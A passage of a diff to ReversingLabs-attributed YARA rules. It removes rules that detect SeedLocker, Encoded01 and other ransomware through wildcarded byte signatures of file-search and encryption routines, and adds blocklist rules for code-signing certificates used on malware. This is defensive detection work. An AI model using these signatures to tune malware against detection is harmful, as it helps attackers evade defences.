C0 0F 85 ?? ?? ?? ?? 8D 5D ?? 8D 76 ?? 8D BC 27 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 - 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D BD ?? ?? ?? ?? - 39 F9 89 C8 76 ?? 0F B6 41 ?? 89 CF 3C ?? 0F 95 C1 3C ?? 0F 95 C2 84 D1 0F 84 ?? ?? - ?? ?? 3C ?? 0F 84 ?? ?? ?? ?? 8D 47 ?? C6 07 ?? 8D 7E ?? 39 D8 89 BD ?? ?? ?? ?? 73 - ?? 0F B6 56 ?? 84 D2 74 ?? 89 F9 8B BD ?? ?? ?? ?? EB ?? 90 0F B6 11 84 D2 74 ?? 83 - C0 ?? 83 C1 ?? 88 50 ?? 39 D8 75 ?? 89 BD ?? ?? ?? ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 31 - FF 89 04 24 E8 ?? ?? ?? ?? 85 C0 89 C2 74 ?? 80 38 ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 90 - 83 C7 ?? 80 3C 3A ?? 75 ?? 89 85 ?? ?? ?? ?? 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 89 95 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 46 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 74 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 7C 24 ?? 89 14 24 89 - } - $encrypt_files_p2 = { - 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 89 F1 89 04 24 E8 ?? ?? ?? ?? - 83 EC ?? 89 F1 E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 89 C7 8D - 40 ?? 83 F8 ?? 76 ?? 89 F1 83 05 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 3C 24 89 44 24 ?? E8 ?? ?? ?? ?? 89 F1 E8 ?? - ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 - ?? ?? ?? ?? 89 F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 89 - F1 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B - B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B B5 ?? ?? ?? - ?? BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A6 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? - 8B 95 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 8D 74 26 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 - E8 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C3 8B 45 ?? 89 1C 24 89 44 24 ?? - 8B 45 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 89 C6 E9 ?? ?? ?? ?? 8D 65 ?? 31 C0 5B 5E 5F 5D - C3 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 - } - $find_files_p1 = { - 8D 4C 24 ?? 83 E4 ?? FF 71 ?? 55 89 E5 57 56 53 51 81 EC ?? ?? ?? ?? 8B 31 8B 79 ?? - E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 7E ?? 89 74 24 ?? C7 04 - 24 ?? ?? ?? ?? 31 DB E8 ?? ?? ?? ?? 8B 04 9F 89 5C 24 ?? 83 C3 ?? C7 04 24 ?? ?? ?? - ?? 89 44 24 ?? E8 ?? ?? ?? ?? 39 DE 75 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 47 ?? 89 04 24 - E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 89 - 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ?? - ?? ?? ?? F3 A5 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 C7 85 - } - $find_files_p2 = { - 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? - 8D 44 03 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 1C 24 89 44 24 ?? E8 - ?? ?? ?? ?? 89 DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? - A9 ?? ?? ?? ?? 74 ?? 89 C1 00 C1 83 DA ?? C7 02 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 - 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 84 C0 74 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 65 ?? 31 C0 59 5B 5E - 5F 5D 8D 61 ?? C3 C1 E8 ?? 83 C2 ?? EB ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 89 04 24 B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 - F9 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 29 CE 81 C1 ?? ?? ?? ?? C1 E9 ?? 89 45 ?? F3 - } - $find_files_p3 = { - A5 89 1C 24 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 C6 74 ?? 89 44 24 ?? C7 44 24 ?? ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 34 24 E8 ?? - ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? E8 - ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 C6 0F 84 ?? ?? ?? ?? 89 44 24 - ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? - ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? E9 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CLEVERCYBER LTD" and pe.signatures[i].serial=="50:d0:8f:3c:9b:f8:6f:ba:52:cf:59:2b:4f:e6:ea:cf" and 1518134400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Ransomware_Seedlocker : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_7C7Fc3616F3157A28F702Cc1Df275Dcd : INFO FILE { meta: - description = "Yara rule that detects SeedLocker ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "efa3dd2e-faf4-5882-aef8-85189e65f0f9" - date = "2020-07-15" - modified = "2020-07-15" + id = "78d2adb9-fc1c-5f48-80cb-3f1bd12b6ba5" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.SeedLocker.yara#L1-L91" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a478efcfb03e3eeebe72d9a71629456cf061c3c779fbdde99539854caf8c7c33" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14950-L14966" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c2dcea21c7a3e3aef6408f11c23edbce6d8f655f298654552a607a9b0caabb28" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "SeedLocker" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files = { - 48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B - 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9 - BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? - 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF - 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24 - ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ?? - ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? - ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3 - 5D C3 - } - $encrypt_files_p1 = { - FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 48 8D 85 ?? ?? ?? - ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 45 33 FF 4C 8D 05 ?? ?? ?? ?? 66 44 89 - 38 45 33 C9 48 83 C0 ?? 4C 89 7C 24 ?? 48 89 05 ?? ?? ?? ?? 33 D2 48 8D 05 ?? ?? ?? - ?? 44 89 7C 24 ?? 33 C9 48 89 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 45 8D 47 ?? 33 - C9 FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? - ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 8B F0 FF - 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 - FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 ?? 48 63 C8 48 8D 1C 4B 66 44 - 39 3B 75 ?? 48 8B CE FF 15 ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 - 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 1D ?? ?? ?? ?? 48 81 - C3 ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B D3 48 8D 4C 24 ?? 44 8B F0 FF - 15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 8D 48 ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B F0 - 48 83 F8 ?? 74 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 41 8D - 46 ?? 48 63 C8 48 8D 1C 4B 66 44 39 3B 75 ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 35 ?? ?? ?? ?? 48 - } - $encrypt_files_p2 = { - 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? - ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 89 BD - ?? ?? ?? ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF - 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 45 - 33 C9 45 33 C0 48 89 44 24 ?? 8D 53 ?? 33 C9 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? - 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? - ?? 3D ?? ?? ?? ?? 75 ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? - ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D - ?? ?? ?? ?? 41 8B DF 48 81 C1 ?? ?? ?? ?? 45 8B F7 FF 15 ?? ?? ?? ?? 85 C0 7E ?? 49 - 8B F7 48 8B 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F BE 8C 06 ?? ?? ?? - ?? 44 0F BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 - 48 8D 8D ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 48 8D 76 ?? FF C3 41 83 C6 ?? - 88 84 0D ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44 - } - $encrypt_files_p3 = { - 3B F0 7C ?? 48 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 48 8D - 95 ?? ?? ?? ?? 44 8B C3 44 89 7C 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? - ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ?? - ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? - 48 89 44 24 ?? 33 D2 48 8D 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41 - ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 8B DF 44 39 BD ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05 - ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 8C 05 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ?? - ?? ?? 72 ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ?? - 48 8B 05 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 83 C0 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? - ?? ?? 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 06 00 48 - 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 66 44 89 BD ?? ?? 00 00 F3 0F 7F 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 48 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 48 8B 8D ?? ?? ?? ?? - 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? - 49 8B E3 41 5F 41 5E 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CFES Projects Ltd" and pe.signatures[i].serial=="7c:7f:c3:61:6f:31:57:a2:8f:70:2c:c1:df:27:5d:cd" and 1522972800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_73Ed1B2F4Bf8Dd37A8Ad9Bb775774592 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "19c9e100-b017-5b5c-8e8f-c94ea9e228c2" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14968-L14984" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "69865935e07ea255a5d690e170911b33574ea61550b00bebc2ceff91ba9a33da" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $search_files and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "5000 LIMITED" and pe.signatures[i].serial=="73:ed:1b:2f:4b:f8:dd:37:a8:ad:9b:b7:75:77:45:92" and 1528243200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Encoded01 : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_211B5Dfe65Bc6F34Bc9D3A54 : INFO FILE { meta: - description = "Yara rule that detects Encoded01 ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "923d987e-f888-5b6a-9ebd-ee1257124aed" - date = "2021-12-16" - modified = "2021-12-16" + id = "5181b6e4-6a25-58f6-88c5-0eae98250648" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Encoded01.yara#L1-L141" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f6f872290f15f4c564911bb099824c47cb13164457e1bcdb02dee441bc2d6b6a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14986-L15002" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cf2e4c0dd98efb77c28b63641196c83e60afc0d6ab64802743c351581506dbb5" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Encoded01" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 51 B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 87 4D ?? 53 56 57 89 4D ?? 89 55 - ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 55 ?? 66 83 7C 42 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 4A 8D 45 ?? E8 ?? - ?? ?? ?? 8B 7D ?? 4F 85 FF 0F 8C ?? ?? ?? ?? 47 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? - ?? ?? ?? 8B 45 ?? 8B 55 ?? FF 34 90 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? - 33 F6 46 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 8D - 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? - ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ?? - ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? - 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 - } - $find_files_p2 = { - C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A1 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 6A ?? 68 ?? - ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 8B 00 E8 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 3B 55 ?? 75 ?? 3B 45 ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 83 7D ?? ?? - 75 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 73 ?? - 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 0F 84 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? - ?? ?? ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? - ?? 33 D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? - ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 74 - ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? ?? ?? - ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 33 - D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? EB ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8A 45 ?? 50 8A 45 ?? 50 FF 75 ?? 68 ?? ?? - ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B - 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 - 40 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 4F - } - $enum_resources = { - 55 8B EC 83 C4 ?? 53 56 57 8B F9 89 55 ?? 8B F0 8B 5D ?? C6 45 ?? ?? 33 C0 89 03 33 - C0 89 07 8D 45 ?? 50 8B 45 ?? 50 6A ?? 56 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 03 83 3B ?? 74 ?? 83 3B ?? 74 ?? - C7 07 ?? ?? ?? ?? 8B 03 33 C9 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 03 50 57 8B 45 - ?? 50 E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 75 ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? EB - ?? BE ?? ?? ?? ?? EB ?? 81 FE ?? ?? ?? ?? 74 ?? 85 F6 0F 94 45 